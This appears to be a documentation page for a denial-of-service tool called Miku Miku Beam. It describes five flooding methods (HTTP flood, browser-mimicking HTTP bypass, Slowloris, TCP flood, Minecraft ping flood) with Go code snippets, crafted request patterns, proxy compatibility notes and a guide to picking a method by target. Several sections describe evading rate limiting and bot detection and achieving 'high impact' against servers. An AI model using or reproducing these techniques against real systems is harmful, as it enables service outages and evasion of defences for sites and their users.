> ## Documentation Index
> Fetch the complete documentation index at: https://mintlify.com/sammwyy/mikuMikuBeam/llms.txt
> Use this file to discover all available pages before exploring further.

# Attack Methods

> Comprehensive overview of all attack methods in Miku Miku Beam

## Available Methods

Miku Miku Beam implements five distinct attack methods, each designed for different use cases and network layers.

<CardGroup cols={2}>
  <Card title="HTTP Flood" icon="water">
    High-volume HTTP requests with GET/POST methods
  </Card>

  <Card title="HTTP Bypass" icon="mask">
    Browser-mimicking requests to bypass basic protections
  </Card>

  <Card title="Slowloris" icon="hourglass">
    Slow header transmission to exhaust server resources
  </Card>

  <Card title="TCP Flood" icon="network-wired">
    Raw TCP packet flooding for Layer 4 testing
  </Card>

  <Card title="Minecraft Ping" icon="cube">
    Minecraft server status request flooding
  </Card>
</CardGroup>

***

## HTTP Flood

**Method ID**: `http_flood`\
**Protocol**: HTTP/HTTPS\
**Supported Proxies**: HTTP, HTTPS, SOCKS4, SOCKS5

### Implementation

Location: `internal/attacks/http/flood.go`

### Strategy

Sends rapid HTTP requests alternating between GET and POST methods based on packet size:

* **Small packets (≤512 bytes)**: 50% GET, 50% POST
* **Large packets (>512 bytes)**: Primarily POST

```go theme={null}
isGet := params.PacketSize <= 512 && rand.Intn(2) == 0
```

### Request Patterns

**GET Requests**: Payload appended to URL path

```http theme={null}
GET /target/path/<random_payload> HTTP/1.1
Host: example.com
User-Agent: <random_user_agent>
```

**POST Requests**: Payload in request body

```http theme={null}
POST /target/path HTTP/1.1
Host: example.com
User-Agent: <random_user_agent>
Content-Length: <packet_size>

<random_payload>
```

### Payload Generation

Random alphanumeric strings using characters `a-zA-Z0-9`:

```go theme={null}
func randomString(n int) string {
    const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    b := make([]byte, n)
    for i := range b {
        b[i] = letters[rand.Intn(len(letters))]
    }
    return string(b)
}
```

### Characteristics

* **Timeout**: 5 seconds per request
* **Redirects**: Follows up to 3 redirects
* **TLS**: Accepts all certificates (`InsecureSkipVerify: true`)
* **Response handling**: Body discarded immediately to free resources

<Info>
  HTTP Flood is optimized for maximum request rate. Responses are read and discarded without processing.
</Info>

***

## HTTP Bypass

**Method ID**: `http_bypass`\
**Protocol**: HTTP/HTTPS\
**Supported Proxies**: HTTP, HTTPS, SOCKS4, SOCKS5

### Implementation

Location: `internal/attacks/http/bypass.go`

### Strategy

Mimics legitimate browser traffic to bypass basic rate limiting and bot detection:

* Randomized URL paths with realistic extensions
* Browser-like headers (Accept, Accept-Language, Accept-Encoding)
* Referer headers (same-origin or popular sites)
* Randomized cookies
* 80% GET, 20% POST distribution

### Path Randomization

```go theme={null}
// Examples of generated paths:
// abc123.js
// def456/xyz9.css
// ghi789.png
// jkl012  (no extension)
```

Extensions include: `.js`, `.css`, `.png`, `.jpg`, `.svg`, or none

### Header Mimicking

```http theme={null}
GET /abc123/xyz9.js?_=vwx45678 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.google.com
Cookie: _ga=abc12345; _gid=def67890
```

### Referer Generation

50% same-origin, 50% popular sites:

```go theme={null}
refs := []string{
    "https://www.google.com",
    "https://www.youtube.com",
    "https://twitter.com"
}
```

### Characteristics

* **Timeout**: 6 seconds per request
* **Redirects**: Follows up to 3 redirects
* **Query strings**: 50% include random cache-busting parameter
* **Cookies**: 50% include Google Analytics-like cookies

<Note>
  HTTP Bypass sacrifices some speed for stealth, appearing more like legitimate traffic patterns.
</Note>

***

## HTTP Slowloris

**Method ID**: `http_slowloris`\
**Protocol**: HTTP/HTTPS\
**Supported Proxies**: SOCKS4, SOCKS5 only

### Implementation

Location: `internal/attacks/http/slowloris.go`

### Strategy

Opens connections and sends HTTP headers slowly, never completing the request. This exhausts server connection pools by holding connections open indefinitely.

<Warning>
  HTTP/HTTPS proxies are NOT supported. Only SOCKS proxies work because this attack requires raw TCP control.
</Warning>

### Attack Flow

1. **Establish TCP/TLS connection** to target
2. **Send initial request line**:
   ```http theme={null}
   GET / HTTP/1.1\r\n
   ```
3. **Dribble headers slowly** (one per `PacketDelay` interval):
   ```http theme={null}
   Host: example.com\r\n
   <delay>
   User-Agent: Mozilla/5.0...\r\n
   <delay>
   Accept: */*\r\n
   <delay>
   Connection: keep-alive\r\n
   <delay>
   ```
4. **Never send final `\r\n`** to complete headers
5. **Keep-alive packets**: Send dummy headers periodically
   ```http theme={null}
   X-a: b\r\n
   ```

### Connection Lifecycle

Each `Fire()` call spawns a goroutine that maintains the connection:

```go theme={null}
go func(c net.Conn) {
    defer c.Close()
    // Send request line
    fmt.Fprintf(bw, "GET / HTTP/1.1\r\n")
    // Dribble headers
    for _, h := range headers {
        bw.WriteString(h + "\r\n")
        bw.Flush()
        time.Sleep(params.PacketDelay)
    }
    // Send keep-alive indefinitely
    ticker := time.NewTicker(params.PacketDelay)
    for {
        <-ticker.C
        bw.WriteString("X-a: b\r\n")
        bw.Flush()
    }
}(conn)
```

### Characteristics

* **Connection duration**: Indefinite (until attack stops or server closes)
* **Resource consumption**: Minimal bandwidth, maximum connection slots
* **TLS support**: Automatically wraps HTTPS targets with TLS
* **Header rate**: Controlled by `PacketDelay` parameter

<Info>
  Slowloris is most effective against servers with low connection limits. Modern servers with proper timeouts may be resistant.
</Info>

***

## TCP Flood

**Method ID**: `tcp_flood`\
**Protocol**: TCP (Layer 4)\
**Supported Proxies**: SOCKS4, SOCKS5 only

### Implementation

Location: `internal/attacks/tcp/flood.go`

### Strategy

Establishes TCP connections and sends bursts of random binary data, testing network and application layer capacity.

### Attack Flow

1. **Parse target** as `host:port` (no URL scheme)
2. **Establish TCP connection** (with optional SOCKS proxy)
3. **Generate random bytes** using `crypto/rand`
4. **Send initial burst** of `PacketSize` bytes (default 512)
5. **Send additional bursts** (1-3 random count)
6. **Close connection**

```go theme={null}
size := params.PacketSize
if size <= 0 {
    size = 512
}
buf := make([]byte, size)
rand.Read(buf)  // crypto/rand for high entropy
conn.Write(buf)

// Send 1-3 additional bursts
bursts := minInt(3, 1+randIntn(3))
for i := 0; i < bursts; i++ {
    rand.Read(buf)
    conn.Write(buf)
}
```

### Characteristics

* **Write deadline**: 2 seconds
* **Payload**: Cryptographically random bytes
* **Burst count**: 1-4 total writes per connection
* **Connection lifecycle**: Short-lived, closed after bursts

<Note>
  TCP Flood targets Layer 4. Use this for testing network infrastructure, firewalls, and TCP-based services.
</Note>

***

## Minecraft Ping

**Method ID**: `minecraft_ping`\
**Protocol**: Minecraft Server List Ping (TCP)\
**Supported Proxies**: SOCKS4, SOCKS5 only

### Implementation

Location: `internal/attacks/game/minecraft_ping.go`

### Strategy

Sends legitimate Minecraft server status requests following the [Server List Ping protocol](https://wiki.vg/Server_List_Ping). This tests Minecraft server capacity to handle status queries.

### Protocol Implementation

Follows Minecraft protocol specification (protocol version 754):

**1. Handshake Packet (0x00)**:

```
Packet ID: 0x00
Protocol Version: VarInt (754)
Server Address: String (hostname)
Server Port: Unsigned Short (big-endian)
Next State: VarInt (0x01 = status)
```

**2. Status Request Packet (0x00)**:

```
Length: VarInt (0x01)
Packet ID: 0x00
```

### Packet Construction

```go theme={null}
const protoVersion = 754
var pkt bytes.Buffer
pkt.WriteByte(0x00)                                // packet id
writeVarInt(&pkt, protoVersion)                    // protocol version
writeString(&pkt, host)                            // server address
binary.Write(&pkt, binary.BigEndian, uint16(port)) // server port
writeVarInt(&pkt, 0x01)                            // next state: status

// Frame with length prefix
var framed bytes.Buffer
writeVarInt(&framed, pkt.Len())
framed.Write(pkt.Bytes())
```

### VarInt Encoding

Minecraft uses variable-length integer encoding:

```go theme={null}
func writeVarInt(w io.ByteWriter, value int) {
    for {
        b := byte(value & 0x7F)
        value >>= 7
        if value != 0 {
            b |= 0x80
        }
        w.WriteByte(b)
        if value == 0 {
            break
        }
    }
}
```

### Port Defaulting

Automatically uses Minecraft's default port:

```go theme={null}
if tn.Scheme == "" && port == 80 {
    port = 25565  // Minecraft default
}
```

### Characteristics

* **Connection timeout**: 3 seconds
* **Response handling**: Reads and discards 256 bytes + 64 bytes
* **Protocol compliance**: Fully compliant with Minecraft Server List Ping
* **Target format**: `hostname:port` or just `hostname` (uses 25565)

<Info>
  This attack is specific to Minecraft servers and won't affect non-Minecraft services, even if they listen on port 25565.
</Info>

***

## Proxy Compatibility Matrix

| Method         | HTTP/HTTPS Proxy | SOCKS4/5 Proxy |
| -------------- | ---------------- | -------------- |
| HTTP Flood     | ✅                | ✅              |
| HTTP Bypass    | ✅                | ✅              |
| HTTP Slowloris | ❌                | ✅              |
| TCP Flood      | ❌                | ✅              |
| Minecraft Ping | ❌                | ✅              |

<Warning>
  Layer 4 attacks (Slowloris, TCP Flood, Minecraft Ping) require direct TCP control and only work with SOCKS proxies.
</Warning>

## Method Selection Guide

### Use HTTP Flood when:

* Maximum request rate is the priority
* Testing raw HTTP server capacity
* Target has no bot protection

### Use HTTP Bypass when:

* Target has basic rate limiting or bot detection
* Need to blend in with legitimate traffic
* Testing WAF or security rules

### Use Slowloris when:

* Testing connection pool limits
* Target has limited concurrent connection capacity
* Low bandwidth but high impact needed

### Use TCP Flood when:

* Testing Layer 4 infrastructure
* Target is a TCP service (not HTTP)
* Firewall or DDoS protection testing

### Use Minecraft Ping when:

* Target is a Minecraft server
* Testing query handling capacity
* Legitimate protocol compliance required
